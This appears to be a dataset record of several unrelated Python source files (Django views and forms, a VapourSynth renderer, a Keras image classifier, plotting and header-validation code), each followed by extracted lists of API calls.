# Django REST Framework
from rest_framework import viewsets, mixins
# Permisos
from rest_framework.permissions import IsAuthenticated
from andromeda.modules.inventory.permissions import IsAdmin, IsStaff
# Modelos
from andromeda.modules.loans.models import InventoryLoans
# Serializers
from andromeda.modules.loans.serializers import InventoryLoansSerializer, CreateInventoryLoansSerializer
class InventoryLoansViewSet(mixins.RetrieveModelMixin,
                            mixins.CreateModelMixin,
                            mixins.ListModelMixin,
                            mixins.UpdateModelMixin,
                            viewsets.GenericViewSet):
    """View set of the inventory for the technology loans module.

    Exposes retrieve, create, list and update. Destroy is not exposed (no
    DestroyModelMixin), but the permission logic still guards the 'destroy'
    action defensively in case it is added later.
    """

    queryset = InventoryLoans.objects.all()

    def get_permissions(self):
        """Assign permissions based on the current action.

        Returns a list of permission *instances*, as DRF expects. The
        original returned a generator expression, which is single-use and
        fragile if the permission set is ever iterated more than once.
        """
        permissions = [IsAuthenticated]
        if self.action in ['destroy']:
            permissions.append(IsAdmin)
        elif self.action in ['update', 'partial_update']:
            permissions.append(IsStaff)
        return [permission() for permission in permissions]

    def get_serializer_class(self):
        """Assign the serializer based on the current action."""
        if self.action == 'create':
            return CreateInventoryLoansSerializer
        return InventoryLoansSerializer
| [
"andromeda.modules.loans.models.InventoryLoans.objects.all"
] | [((818, 846), 'andromeda.modules.loans.models.InventoryLoans.objects.all', 'InventoryLoans.objects.all', ([], {}), '()\n', (844, 846), False, 'from andromeda.modules.loans.models import InventoryLoans\n')] |
import matplotlib.pyplot as plt

COLORS = ["red", "blue", "purple", "violet", "green", "black"]


def plot_labelled_barh(labels, values, colors=COLORS, xlim=(0.0, 1.3)):
    """Draw a horizontal bar chart with each bar's value printed next to it.

    Extracted helper: the original script duplicated this whole plotting
    section twice, verbatim, for the two experiments below.

    Args:
        labels: Category names, one per bar.
        values: Bar lengths (accuracies), same length as ``labels``.
        colors: Per-bar colors.
        xlim:   X-axis limits, widened past 1.0 so the value labels fit.
    """
    bars = plt.barh(labels, values, color=colors)
    for bar in bars:  # annotate every bar with its numeric value
        width = bar.get_width()
        print(width)
        plt.text(width, bar.get_y() + bar.get_height() / 2, str(width), size=10)
    plt.xlim(*xlim)
    plt.show()


# Accuracy versus N.
plot_labelled_barh(["N=1", "N=2", "N=3", "N=4", "N=5", "N=6"],
                   [0.9365, 0.9865, 0.9895, 0.9950, 0.9880, 0.9615])

# Accuracy versus k.
plot_labelled_barh(["k=1e-5", "k=1e-4", "k=1e-3", "k=1e-2", "k=1e-1", "k=1.0"],
                   [0.9895, 0.9900, 0.9950, 0.9885, 0.9740, 0.831])
"matplotlib.pyplot.barh",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.show"
] | [((138, 213), 'matplotlib.pyplot.barh', 'plt.barh', (['x', 'y'], {'color': "['red', 'blue', 'purple', 'violet', 'green', 'black']"}), "(x, y, color=['red', 'blue', 'purple', 'violet', 'green', 'black'])\n", (146, 213), True, 'import matplotlib.pyplot as plt\n'), ((376, 394), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0.0)', '(1.3)'], {}), '(0.0, 1.3)\n', (384, 394), True, 'import matplotlib.pyplot as plt\n'), ((409, 419), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (417, 419), True, 'import matplotlib.pyplot as plt\n'), ((595, 670), 'matplotlib.pyplot.barh', 'plt.barh', (['x', 'y'], {'color': "['red', 'blue', 'purple', 'violet', 'green', 'black']"}), "(x, y, color=['red', 'blue', 'purple', 'violet', 'green', 'black'])\n", (603, 670), True, 'import matplotlib.pyplot as plt\n'), ((833, 851), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0.0)', '(1.3)'], {}), '(0.0, 1.3)\n', (841, 851), True, 'import matplotlib.pyplot as plt\n'), ((866, 876), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (874, 876), True, 'import matplotlib.pyplot as plt\n')] |
"""
Clip rendering helpers.
"""
import vapoursynth as vs
from enum import Enum
from threading import Condition
from typing import BinaryIO, Callable, Dict, List, Optional, TextIO, Union
from concurrent.futures import Future
from functools import partial
from .progress import Progress, BarColumn, FPSColumn, TextColumn, TimeRemainingColumn
from .util import get_prop
core = vs.core
RenderCallback = Callable[[int, vs.VideoFrame], None]
class RenderContext:
    """
    Contains info on the current render operation.

    Shared mutable state between the render driver and the per-frame
    completion callbacks in ``clip_async_render``.
    """
    clip: vs.VideoNode                  # clip being rendered
    queued: int                         # number of frame requests issued so far
    frames: Dict[int, vs.VideoFrame]    # completed frames not yet consumed, keyed by frame number
    frames_rendered: int                # next frame number to output (frames are consumed in order)
    timecodes: List[float]              # cumulative timestamps in seconds, seeded with t=0
    condition: Condition                # wakes the driver thread when progress is made

    def __init__(self, clip: vs.VideoNode, queued: int) -> None:
        self.clip = clip
        self.queued = queued
        self.frames = {}
        self.frames_rendered = 0
        self.timecodes = [0.0]
        self.condition = Condition()
def finish_frame(outfile: Optional[BinaryIO], timecodes: Optional[TextIO], ctx: RenderContext) -> None:
    """
    Output a frame.

    Writes the timestamp (integer milliseconds, timecodes-v2 format) of the
    next in-order frame and/or its raw plane data in y4m form.

    :param outfile: Output IO handle for Y4MPEG; if ``None``, no y4m data is written
    :param timecodes: Output IO handle for timecodesv2; if ``None``, no timestamp is written
    :param ctx: Rendering context
    """
    if timecodes:
        # One integer-millisecond timestamp per line (timecodes v2).
        timecodes.write(f"{round(ctx.timecodes[ctx.frames_rendered]*1000):d}\n")
    if outfile is None:
        return
    f: vs.VideoFrame = ctx.frames[ctx.frames_rendered]
    outfile.write("FRAME\n".encode("utf-8"))
    for i, p in enumerate(f.planes()):
        if f.get_stride(i) != p.width * f.format.bytes_per_sample:
            # Row stride differs from the tight row width, i.e. rows carry
            # padding. NOTE(review): this path assumes ``bytes(p)`` yields the
            # plane without padding — confirm against the VapourSynth plane API.
            outfile.write(bytes(p))  # type: ignore
        else:
            # Tightly packed plane: write the buffer directly, no copy.
            outfile.write(p)  # type: ignore
def clip_async_render(clip: vs.VideoNode,
                      outfile: Optional[BinaryIO] = None,
                      timecodes: Optional[TextIO] = None,
                      progress: Optional[str] = "Rendering clip...",
                      callback: Union[RenderCallback, List[RenderCallback], None] = None) -> List[float]:
    """
    Render a clip by requesting frames asynchronously using clip.get_frame_async,
    providing for callback with frame number and frame object.

    This is mostly a re-implementation of VideoNode.output, but a little bit slower since it's pure python.

    You only really need this when you want to render a clip while operating on each frame in order
    or you want timecodes without using vspipe.

    :param clip:      Clip to render.
    :param outfile:   Y4MPEG render output BinaryIO handle. If None, no Y4M output is performed.
                      Use ``sys.stdout.buffer`` for stdout. (Default: None)
    :param timecodes: Timecode v2 file TextIO handle. If None, timecodes will not be written.
    :param progress:  String to use for render progress display.
                      If empty or ``None``, no progress display.
    :param callback:  Single or list of callbacks to be preformed. The callbacks are called
                      when each sequential frame is output, not when each frame is done.
                      Must have signature ``Callable[[int, vs.VideoNode], None]``
                      See :py:func:`lvsfunc.comparison.diff` for a use case (Default: None).

    :return:          List of timecodes from rendered clip.
    """
    # Normalize ``callback`` into a (possibly empty) list of callbacks.
    cbl = [] if callback is None else callback if isinstance(callback, list) else [callback]
    if progress:
        p = get_render_progress()
        task = p.add_task(progress, total=clip.num_frames)

        # Progress display is implemented as just another per-frame callback.
        def _progress_cb(n: int, f: vs.VideoFrame) -> None:
            p.update(task, advance=1)

        cbl.append(_progress_cb)

    # One frame request per VS worker thread is kept in flight at all times.
    ctx = RenderContext(clip, core.num_threads)

    bad_timecodes: bool = False

    # Completion callback: runs on a VS worker thread each time a requested
    # frame finishes. It drains all frames that are now available *in order*,
    # enqueues the next request, then wakes the driver thread below.
    def cb(f: Future[vs.VideoFrame], n: int) -> None:
        ctx.frames[n] = f.result()
        nn = ctx.queued

        # Consume every consecutive frame starting at ``frames_rendered``;
        # out-of-order completions simply wait in ``ctx.frames`` until their turn.
        while ctx.frames_rendered in ctx.frames:
            nonlocal timecodes
            nonlocal bad_timecodes
            frame = ctx.frames[ctx.frames_rendered]
            # if a frame is missing timing info, clear timecodes because they're worthless
            if ("_DurationNum" not in frame.props or "_DurationDen" not in frame.props) and not bad_timecodes:
                bad_timecodes = True
                if timecodes:
                    # Discard anything already written to the timecodes file.
                    timecodes.seek(0)
                    timecodes.truncate()
                    timecodes = None
                ctx.timecodes = []
                print("clip_async_render: frame missing duration information, discarding timecodes")
            elif not bad_timecodes:
                # Cumulative timestamp: previous timestamp + this frame's duration.
                ctx.timecodes.append(ctx.timecodes[-1]
                                     + get_prop(frame, "_DurationNum", int)
                                     / get_prop(frame, "_DurationDen", int))
            finish_frame(outfile, timecodes, ctx)
            # Fire user callbacks with (frame number, frame), in output order.
            [cb(ctx.frames_rendered, ctx.frames[ctx.frames_rendered]) for cb in cbl]
            del ctx.frames[ctx.frames_rendered]  # tfw no infinite memory
            ctx.frames_rendered += 1

        # enqueue a new frame
        if nn < clip.num_frames:
            ctx.queued += 1
            cbp = partial(cb, n=nn)
            clip.get_frame_async(nn).add_done_callback(cbp)  # type: ignore

        # Wake the driver thread so it can re-check the completion condition.
        ctx.condition.acquire()
        ctx.condition.notify()
        ctx.condition.release()

    if outfile:
        if clip.format is None:
            raise ValueError("clip_async_render: 'Cannot render a variable format clip to y4m!'")
        if clip.format.color_family not in (vs.YUV, vs.GRAY):
            raise ValueError("clip_async_render: 'Can only render YUV and GRAY clips to y4m!'")
        if clip.format.color_family == vs.GRAY:
            y4mformat = "mono"
        else:
            # Map VS chroma subsampling factors to the y4m colorspace tag.
            ss = (clip.format.subsampling_w, clip.format.subsampling_h)
            if ss == (1, 1):
                y4mformat = "420"
            elif ss == (1, 0):
                y4mformat = "422"
            elif ss == (0, 0):
                y4mformat = "444"
            elif ss == (2, 2):
                y4mformat = "410"
            elif ss == (2, 0):
                y4mformat = "411"
            elif ss == (0, 1):
                y4mformat = "440"
            else:
                raise ValueError("clip_async_render: 'What have you done'")

        # High bit depths carry a "p<bits>" suffix, e.g. "420p10".
        y4mformat = f"{y4mformat}p{clip.format.bits_per_sample}" if clip.format.bits_per_sample > 8 else y4mformat
        header = f"YUV4MPEG2 C{y4mformat} W{clip.width} H{clip.height} F{clip.fps_num}:{clip.fps_den} Ip A0:0\n"
        outfile.write(header.encode("utf-8"))

    if timecodes:
        timecodes.write("# timestamp format v2\n")

    # Hold the lock while seeding so no callback can notify before we wait.
    ctx.condition.acquire()

    # seed threads
    if progress:
        p.start()
    try:
        for n in range(min(clip.num_frames, core.num_threads)):
            cbp = partial(cb, n=n)  # lambda won't bind the int immediately
            clip.get_frame_async(n).add_done_callback(cbp)  # type: ignore

        # Block until every frame has been rendered and consumed.
        while ctx.frames_rendered != clip.num_frames:
            ctx.condition.wait()
    finally:
        if progress:
            p.stop()

    return ctx.timecodes  # might as well
def get_render_progress() -> Progress:
    """Build the default progress bar layout used while rendering clips."""
    columns = (
        TextColumn("{task.description}"),
        BarColumn(),
        TextColumn("{task.completed}/{task.total}"),
        TextColumn("{task.percentage:>3.02f}%"),
        FPSColumn(),
        TimeRemainingColumn(),
    )
    return Progress(*columns)
class SceneChangeMode(Enum):
    """Scene-change detection backend selection for ``find_scene_changes``."""
    WWXD = 0                      # wwxd plugin only
    SCXVID = 1                    # scxvid plugin only
    WWXD_SCXVID_UNION = 2         # flagged by at least one of the two
    WWXD_SCXVID_INTERSECTION = 3  # flagged by both
def find_scene_changes(clip: vs.VideoNode, mode: SceneChangeMode = SceneChangeMode.WWXD) -> List[int]:
    """
    Generate a list of scene changes (keyframes).

    Dependencies:
    * vapoursynth-wwxd
    * vapoursynth-scxvid (Optional: scxvid mode)

    :param clip:   Clip to search for scene changes. Will be rendered in its entirety.
    :param mode:   Scene change detection mode:

                   * WWXD: Use wwxd
                   * SCXVID: Use scxvid
                   * WWXD_SCXVID_UNION: Union of wwxd and sxcvid (must be detected by at least one)
                   * WWXD_SCXVID_INTERSECTION: Intersection of wwxd and scxvid (must be detected by both)

    :return:       List of scene changes.
    """
    frames = []
    # Downscale to speed up detection; detectors require YUV420P8 input here.
    clip = clip.resize.Bilinear(640, 360, format=vs.YUV420P8)

    # Decide once which detectors run, instead of re-branching on ``mode``
    # inside the per-frame callback (the original duplicated the prop checks
    # across a four-way if/elif chain).
    use_wwxd = mode in (SceneChangeMode.WWXD,
                        SceneChangeMode.WWXD_SCXVID_UNION,
                        SceneChangeMode.WWXD_SCXVID_INTERSECTION)
    use_scxvid = mode in (SceneChangeMode.SCXVID,
                          SceneChangeMode.WWXD_SCXVID_UNION,
                          SceneChangeMode.WWXD_SCXVID_INTERSECTION)
    if use_wwxd:
        clip = clip.wwxd.WWXD()
    if use_scxvid:
        clip = clip.scxvid.Scxvid()

    def _cb(n: int, f: vs.VideoFrame) -> None:
        # Only read the frame props produced by the enabled detectors.
        wwxd_hit = use_wwxd and get_prop(f, "Scenechange", int) == 1
        scxvid_hit = use_scxvid and get_prop(f, "_SceneChangePrev", int) == 1
        if mode == SceneChangeMode.WWXD_SCXVID_INTERSECTION:
            hit = wwxd_hit and scxvid_hit
        else:
            # Single-detector modes and UNION reduce to "any enabled detector fired".
            hit = wwxd_hit or scxvid_hit
        if hit:
            frames.append(n)

    clip_async_render(clip, progress="Detecting scene changes...", callback=_cb)

    return sorted(frames)
| [
"threading.Condition",
"functools.partial"
] | [((917, 928), 'threading.Condition', 'Condition', ([], {}), '()\n', (926, 928), False, 'from threading import Condition\n'), ((5104, 5121), 'functools.partial', 'partial', (['cb'], {'n': 'nn'}), '(cb, n=nn)\n', (5111, 5121), False, 'from functools import partial\n'), ((6767, 6783), 'functools.partial', 'partial', (['cb'], {'n': 'n'}), '(cb, n=n)\n', (6774, 6783), False, 'from functools import partial\n')] |
from django import forms
from django.utils.translation import ugettext_lazy as _
from geekjobs.models import Job
"""
class JobForm(forms.Form):
title = forms.CharField(label='Job title', max_length=380)
city = forms.CharField(label='City', max_length=100, required=False)
state = forms.ChoiceField(label='State', choices=DE_STATE_CHOICES)
remote = forms.BooleanField(label='Remote', required=False)
salary = forms.CharField(label='Salary', max_length=100, required=False)
description = forms.CharField(label='Job Description', max_length=10000)
description.widget = forms.HiddenInput()
instructions = forms.CharField(label='How do people apply for this job?', max_length=380)
instructions.widget = forms.Textarea(attrs={'rows': 3})
name = forms.CharField(label='Company Name', max_length=100)
url = forms.CharField(label='Job URL', max_length=150)
email = forms.EmailField(label='Email')
"""
class JobForm(forms.ModelForm):
    """ModelForm for creating and editing a Job posting.

    Replaces the hand-written ``forms.Form`` kept (commented out) above;
    field definitions come from the ``Job`` model, with only widgets and
    labels customised here.
    """

    class Meta:
        model = Job
        fields = ('title', 'city', 'state', 'remote', 'salary', 'description', 'instructions', 'name', 'url', 'email')
        widgets = {
            # NOTE(review): 'description' is hidden, so it is presumably
            # populated client-side (e.g. a rich-text editor) — confirm
            # against the template before changing.
            'description': forms.HiddenInput,
            'instructions': forms.Textarea(attrs={'rows': 3})
        }
        labels = {
            'title': _('Job Title'),
            'city': _('City'),
            'state': _('State'),
            'remote': _('Remote'),
            'salary': _('Salary'),
            'description': _('Job Description'),
            'instructions': _('How do people apply for this job?'),
            'name': _('Company Name'),
            'url': _('Job URL'),
            'email': _('Email')
        }
| [
"django.utils.translation.ugettext_lazy",
"django.forms.Textarea"
] | [((1224, 1257), 'django.forms.Textarea', 'forms.Textarea', ([], {'attrs': "{'rows': 3}"}), "(attrs={'rows': 3})\n", (1238, 1257), False, 'from django import forms\n'), ((1308, 1322), 'django.utils.translation.ugettext_lazy', '_', (['"""Job Title"""'], {}), "('Job Title')\n", (1309, 1322), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1344, 1353), 'django.utils.translation.ugettext_lazy', '_', (['"""City"""'], {}), "('City')\n", (1345, 1353), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1376, 1386), 'django.utils.translation.ugettext_lazy', '_', (['"""State"""'], {}), "('State')\n", (1377, 1386), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1410, 1421), 'django.utils.translation.ugettext_lazy', '_', (['"""Remote"""'], {}), "('Remote')\n", (1411, 1421), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1445, 1456), 'django.utils.translation.ugettext_lazy', '_', (['"""Salary"""'], {}), "('Salary')\n", (1446, 1456), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1485, 1505), 'django.utils.translation.ugettext_lazy', '_', (['"""Job Description"""'], {}), "('Job Description')\n", (1486, 1505), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1535, 1573), 'django.utils.translation.ugettext_lazy', '_', (['"""How do people apply for this job?"""'], {}), "('How do people apply for this job?')\n", (1536, 1573), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1595, 1612), 'django.utils.translation.ugettext_lazy', '_', (['"""Company Name"""'], {}), "('Company Name')\n", (1596, 1612), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1633, 1645), 'django.utils.translation.ugettext_lazy', '_', (['"""Job URL"""'], {}), "('Job URL')\n", (1634, 1645), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((1668, 1678), 'django.utils.translation.ugettext_lazy', '_', (['"""Email"""'], {}), 
"('Email')\n", (1669, 1678), True, 'from django.utils.translation import ugettext_lazy as _\n')] |
import asyncio
import os
from youwol_utils import WhereClause, QueryBody, Query, Path, flatten
from .configurations import Configuration
from .utils import format_download_form, post_storage_by_chunk, md5_from_folder
from .utils_indexing import format_doc_db_record, post_indexes, get_version_number_str
async def init_resources(config: Configuration):
    """Ensure the doc-db table and storage bucket exist and hold the required libraries.

    Verifies that every entry of ``Configuration.required_libs`` (format
    ``"name#version"``) is present in the index; if any is missing, uploads
    the bundled ``initial_resources`` folder via :func:`synchronize`.

    Raises:
        Exception: if the bucket already exists but the index table does not
            (manual re-indexing required).
    """
    print("### Ensure database resources ###")
    headers = await config.admin_headers if config.admin_headers else {}
    doc_db = config.doc_db
    storage = config.storage
    # Create table and bucket concurrently; each returns whether it already existed.
    table_ok, bucket_ok = await asyncio.gather(
        doc_db.ensure_table(headers=headers),
        storage.ensure_bucket(headers=headers)
    )
    if bucket_ok and not table_ok:
        # Data exists but the index does not: refuse to guess, require manual sync.
        print("Need to re-index stuffs of bucket")
        raise Exception("The table index is not up-to-date w/ bucket content, manual index-synchronisation needed")
    # One (name, version) where-clause pair per required library "name#version".
    clauses = [[WhereClause(column="library_name", relation="eq", term=lib.split("#")[0]),
                WhereClause(column="version_number", relation="eq", term=get_version_number_str(lib.split("#")[1]))
                ]
               for lib in Configuration.required_libs]
    bodies = [QueryBody(query=Query(where_clause=c)) for c in clauses]
    responses = await asyncio.gather(*[doc_db.query(query_body=b, owner=Configuration.owner, headers=headers)
                                      for b in bodies])
    # Every required library must resolve to exactly one indexed document.
    if all([len(r['documents']) == 1 for r in responses]):
        print("Found required resources")
        return
    print("post initial resources")
    await synchronize(Path(__file__).parent / "initial_resources", "", config, headers=headers)
    print("### resources initialization done ###")
async def synchronize(dir_path: Path, zip_dir_name: str, configuration: Configuration, headers: any):
    """Upload every file under ``dir_path`` to storage and index its packages.

    All files are posted to storage; each ``package.json`` found is turned
    into a doc-db index record fingerprinted with the md5 of the whole folder.

    Args:
        dir_path: Root folder to synchronize.
        zip_dir_name: Sub-folder name used as the storage path prefix.
        configuration: Service configuration providing ``storage`` and ``doc_db``.
        headers: Request headers forwarded to storage/doc-db calls
            (presumably an auth header dict — confirm with callers).

    Returns:
        Tuple ``(n_files_posted, n_index_records, namespaces)``.
    """
    # Collect every file (recursively) below dir_path.
    paths = flatten([[Path(root) / f for f in files] for root, _, files in os.walk(str(dir_path))])
    paths = list(paths)
    forms = await asyncio.gather(*[format_download_form(path, Path(), dir_path / zip_dir_name, False)
                                  for path in paths])
    await post_storage_by_chunk(configuration.storage, list(forms), 1, headers)
    # Only package.json files become index records.
    paths_index = flatten([[Path(root) / f for f in files if f == "package.json"]
                           for root, _, files in os.walk(str(dir_path))])
    # Folder-level checksum used as the fingerprint of every record.
    check_dum = md5_from_folder(dir_path)
    indexes = [format_doc_db_record(package_path=path, fingerprint=check_dum) for path in paths_index]
    namespaces = {d["namespace"] for d in indexes}
    await post_indexes(configuration.doc_db, indexes, 25, headers)
    return len(forms), len(indexes), namespaces
| [
"youwol_utils.Path",
"youwol_utils.Query"
] | [((1197, 1218), 'youwol_utils.Query', 'Query', ([], {'where_clause': 'c'}), '(where_clause=c)\n', (1202, 1218), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((1582, 1596), 'youwol_utils.Path', 'Path', (['__file__'], {}), '(__file__)\n', (1586, 1596), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((1825, 1835), 'youwol_utils.Path', 'Path', (['root'], {}), '(root)\n', (1829, 1835), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((2194, 2204), 'youwol_utils.Path', 'Path', (['root'], {}), '(root)\n', (2198, 2204), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n'), ((1989, 1995), 'youwol_utils.Path', 'Path', ([], {}), '()\n', (1993, 1995), False, 'from youwol_utils import WhereClause, QueryBody, Query, Path, flatten\n')] |
from django.contrib import admin
from .models import KwikPost, Comment, Like
# Register your models here.
@admin.register(KwikPost)
class KwikPostAdmin(admin.ModelAdmin):
    """Admin configuration for KwikPost entries."""
    list_display = ['user', 'featured_image', 'slug', 'post_body', 'created_at']
    list_filter = ['created_at']
    # Auto-fill the slug from the post body. The original value,
    # ``('post_body',)[:20]``, sliced the one-element *tuple* (a no-op) —
    # prepopulated_fields just takes a tuple of source field names.
    prepopulated_fields = {'slug': ('post_body',)}
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
    """Admin configuration for Comment entries."""
    # Columns shown in the comment change-list view.
    list_display = ['user', 'post', 'user_comment', 'created_at']
@admin.register(Like)
class LikeAdmin(admin.ModelAdmin):
    """Admin configuration for Like entries."""
    # Columns shown in the like change-list view.
    list_display = ['user', 'post', 'values', 'created_at']
| [
"django.contrib.admin.register"
] | [((110, 134), 'django.contrib.admin.register', 'admin.register', (['KwikPost'], {}), '(KwikPost)\n', (124, 134), False, 'from django.contrib import admin\n'), ((347, 370), 'django.contrib.admin.register', 'admin.register', (['Comment'], {}), '(Comment)\n', (361, 370), False, 'from django.contrib import admin\n'), ((478, 498), 'django.contrib.admin.register', 'admin.register', (['Like'], {}), '(Like)\n', (492, 498), False, 'from django.contrib import admin\n')] |
import keras
from keras import layers
from keras.layers import Dropout, Dense
from keras.preprocessing.image import ImageDataGenerator
import numpy as np
import tensorflow_hub as hub
import cv2
import pandas as p
IMAGE_SHAPE = (224, 224) #(HEIGHT, WIDTH)
TRAINING_DATA_DIRECTORY = '/content/drive/My Drive/Colab Notebooks/FlowerClassification/data/TrainingData'
datagen_kwargs = dict(rescale=1./255, validation_split=.2)
def get_validation_generator():
    """Flow the validation subset (20% split) of images from TRAINING_DATA_DIRECTORY."""
    flow_options = dict(subset='validation', shuffle=True, target_size=IMAGE_SHAPE)
    return ImageDataGenerator(**datagen_kwargs).flow_from_directory(
        TRAINING_DATA_DIRECTORY, **flow_options)
def get_training_generator():
    """Flow the training subset (80% split) of images from TRAINING_DATA_DIRECTORY."""
    flow_options = dict(subset='training', shuffle=True, target_size=IMAGE_SHAPE)
    return ImageDataGenerator(**datagen_kwargs).flow_from_directory(
        TRAINING_DATA_DIRECTORY, **flow_options)
def get_mobile_net_model(num_classes=None):
    """Build a transfer-learning classifier on frozen MobileNetV2 features.

    Args:
        num_classes: Number of output classes. When None (the
            backward-compatible default), it is derived from the training
            data directory via ``get_training_generator()``. The original
            body referenced a module-level ``training_generator`` that was
            never defined, so any call raised NameError.

    Returns:
        An uncompiled ``keras.Sequential`` model built for 224x224 RGB input.
    """
    if num_classes is None:
        num_classes = get_training_generator().num_classes
    model = keras.Sequential()
    # Frozen MobileNetV2 feature extractor from TF-Hub (1280-d features).
    model.add(hub.KerasLayer(
        'https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4',
        output_shape=[1280],
        trainable=False)
    )
    model.add(Dropout(0.4))  # regularize the classification head
    model.add(Dense(num_classes, activation='softmax'))
    model.build([None, 224, 224, 3])
    model.summary()
    return model
def train_model(model, training_generator=None, validation_generator=None):
    """Compile and fit *model*, save it and its training history, and return it.

    Args:
        model: A built (uncompiled) keras model.
        training_generator: Optional data generator; derived from the data
            directory when None.
        validation_generator: Optional validation generator; derived from the
            data directory when None.

    Returns:
        The trained model.
    """
    if training_generator is None:
        training_generator = get_training_generator()
    if validation_generator is None:
        validation_generator = get_validation_generator()
    optimizer = keras.optimizers.Adam(lr=1e-3)
    model.compile(
        optimizer=optimizer,
        loss='categorical_crossentropy',
        metrics=['acc']
    )
    steps_per_epoch = np.ceil(
        training_generator.samples / training_generator.batch_size
    )
    validation_steps_per_epoch = np.ceil(
        validation_generator.samples / validation_generator.batch_size
    )
    # NOTE(review): epochs=20, but the output file names say "100_epochs" —
    # names kept as-is for compatibility; confirm which is intended.
    hist = model.fit(
        training_generator,
        epochs=20,
        verbose=1,
        steps_per_epoch=steps_per_epoch,
        validation_data=validation_generator,
        validation_steps=validation_steps_per_epoch
    ).history
    print('model trained')
    model.save('/content/drive/My Drive/Colab Notebooks/FlowerClassification/model_100_epochs.h5')
    print('model saved')
    # Persist the history dict as JSON. The original referenced the undefined
    # names ``pd`` and ``history``: pandas is imported at module level as
    # ``p``, and ``hist`` already *is* the History.history dict.
    hist_df = p.DataFrame(hist)
    hist_json_file = 'history_100_epochs.json'
    with open(hist_json_file, mode='w') as f:
        hist_df.to_json(f)
    return model
def evaluate_model(model, validation_generator=None, validation_steps_per_epoch=None):
    """Evaluate *model* on the validation split and print loss and accuracy.

    The original body read the module-level names ``validation_generator``
    and ``validation_steps_per_epoch``, which are never defined at module
    scope (they were locals of ``train_model``), so any call raised
    NameError. Both are now optional parameters derived from the data
    directory when omitted, keeping the ``evaluate_model(model)`` call form.
    """
    if validation_generator is None:
        validation_generator = get_validation_generator()
    if validation_steps_per_epoch is None:
        validation_steps_per_epoch = np.ceil(
            validation_generator.samples / validation_generator.batch_size
        )
    final_loss, final_accuracy = model.evaluate(validation_generator, steps=validation_steps_per_epoch)
    print("Final Loss: ", final_loss)
    print("Final accuracy: ", final_accuracy * 100)
if __name__ == '__main__':
    # End-to-end: build, train (and persist), then evaluate the classifier.
    trained_model = train_model(get_mobile_net_model())
    evaluate_model(trained_model)
| [
"keras.optimizers.Adam",
"keras.Sequential",
"numpy.ceil",
"keras.preprocessing.image.ImageDataGenerator",
"keras.layers.Dense",
"tensorflow_hub.KerasLayer",
"keras.layers.Dropout"
] | [((489, 525), 'keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {}), '(**datagen_kwargs)\n', (507, 525), False, 'from keras.preprocessing.image import ImageDataGenerator\n'), ((812, 848), 'keras.preprocessing.image.ImageDataGenerator', 'ImageDataGenerator', ([], {}), '(**datagen_kwargs)\n', (830, 848), False, 'from keras.preprocessing.image import ImageDataGenerator\n'), ((1111, 1129), 'keras.Sequential', 'keras.Sequential', ([], {}), '()\n', (1127, 1129), False, 'import keras\n'), ((1774, 1805), 'keras.optimizers.Adam', 'keras.optimizers.Adam', ([], {'lr': '(0.001)'}), '(lr=0.001)\n', (1795, 1805), False, 'import keras\n'), ((1948, 2015), 'numpy.ceil', 'np.ceil', (['(training_generator.samples / training_generator.batch_size)'], {}), '(training_generator.samples / training_generator.batch_size)\n', (1955, 2015), True, 'import numpy as np\n'), ((2064, 2135), 'numpy.ceil', 'np.ceil', (['(validation_generator.samples / validation_generator.batch_size)'], {}), '(validation_generator.samples / validation_generator.batch_size)\n', (2071, 2135), True, 'import numpy as np\n'), ((1144, 1275), 'tensorflow_hub.KerasLayer', 'hub.KerasLayer', (['"""https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4"""'], {'output_shape': '[1280]', 'trainable': '(False)'}), "(\n 'https://tfhub.dev/google/tf2-preview/mobilenet_v2/feature_vector/4',\n output_shape=[1280], trainable=False)\n", (1158, 1275), True, 'import tensorflow_hub as hub\n'), ((1313, 1325), 'keras.layers.Dropout', 'Dropout', (['(0.4)'], {}), '(0.4)\n', (1320, 1325), False, 'from keras.layers import Dropout, Dense\n'), ((1341, 1400), 'keras.layers.Dense', 'Dense', (['training_generator.num_classes'], {'activation': '"""softmax"""'}), "(training_generator.num_classes, activation='softmax')\n", (1346, 1400), False, 'from keras.layers import Dropout, Dense\n')] |
"""
A set of functions for extracting header information from PSG objects
Typically only used internally in from unet.io.header.header_extractors
Each function takes some PSG or header-like object and returns a dictionary with at least
the following keys:
{
'n_channels': int,
'channel_names': list of strings,
'sample_rate': int
'date': datetime or None
'length': int
}
Note: length gives the number of samples, divide by sample_rate to get length_sec
"""
import logging
import warnings
import numpy as np
import h5py
from datetime import datetime
from psg_utils.errors import (MissingHeaderFieldError, HeaderFieldTypeError,
LengthZeroSignalError, H5VariableAttributesError,
VariableSampleRateError, FloatSampleRateWarning)
logger = logging.getLogger(__name__)
def _assert_header(header):
    """
    Validate a standardized header dict.

    Ensures that the header:
    1) contains all required field names,
    2) stores a value of an expected type for each field,
    3) has a 'length' value greater than 0,
    and warns on duplicate channel names.

    Args:
        header: dict

    Returns: dict (the same header, unmodified)
    """
    # Required field -> list of accepted value types.
    expected_types = {
        "n_channels": [int],
        "channel_names": [list],
        "sample_rate": [int],
        "date": [datetime, type(None)],
        "length": [int],
    }
    for field, valid_types in expected_types.items():
        if field not in header:
            raise MissingHeaderFieldError(f"Missing value '{field}' from header '{header}'. "
                                          "This could be an error in the code implementation. "
                                          "Please raise this issue on GitHub.")
        type_ = type(header[field])
        if type_ not in valid_types:
